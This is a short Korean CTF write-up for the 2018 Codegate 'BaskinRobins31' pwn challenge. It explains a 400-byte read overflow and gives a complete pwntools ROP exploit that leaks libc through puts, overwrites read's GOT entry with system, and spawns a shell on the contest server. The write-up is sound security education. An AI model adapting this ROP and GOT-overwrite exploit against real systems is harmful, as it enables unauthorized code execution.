2018 Codegate BaskinRobins31

보호기법부터 체크하자!

메인함수를 보자!

재미있는 베스킨라빈스 게임이다. Hint is ROP? 어딘가 값을 크게 받는가보다.

어디서 받을까하고 찾아봤더니

your_turn 함수에서 s 사이즈보다 큰 400byte를 받는다. PIE와 Full RELRO도 걸리지 않았으니 bss 영역과 함수들의 plt got를 이용하여 ROP를 했다.

from pwn import*
#p = process(["./BaskinRobins31"],env={'LD_PRELPAD':'libc6_2.23-0ubuntu10_amd64.so'})
p = remote("ch41l3ng3s.codegate.kr",3131)
elf = ELF("./BaskinRobins31")
rdi =  0x00400bc3 
rsi = 0x00400bc1 
rdx = 0x0040087c
read_plt = elf.plt["read"]
read_got = elf.got["read"]
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
bss = elf.bss()
binsh = "/bin/sh\x00"
 
 
payload = "A"*176
payload += "B"*8
payload += p64(rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(rdi)
payload += p64(0)
payload += p64(rsi)
payload += p64(bss)
payload += p64(bss)
payload += p64(rdx)
payload += p64(len(binsh)+1)
payload += p64(read_plt)
 
payload += p64(rdi)
payload += p64(0)
payload += p64(rsi)
payload += p64(read_got)
payload += p64(read_got)
payload += p64(rdx)
payload += p64(8)
payload += p64(read_plt)
 
payload += p64(rdi)
payload += p64(bss)
payload += p64(read_plt)
print p.recv(1024)
 
 
p.send(payload)
print p.recvuntil("Don't break the rules...:( \n")
leak = u64(p.recv(6)+"\x00\x00")
base = leak - 0x6f690
system = base+0x45390
print "1: "+hex(leak)
print "2: "+hex(base)
print "3: "+hex(system)
p.send(binsh)
p.send(p64(system))
p.interactive()

풀 수 있는 문제들이 나와서 다행인 대회였다ㅎ.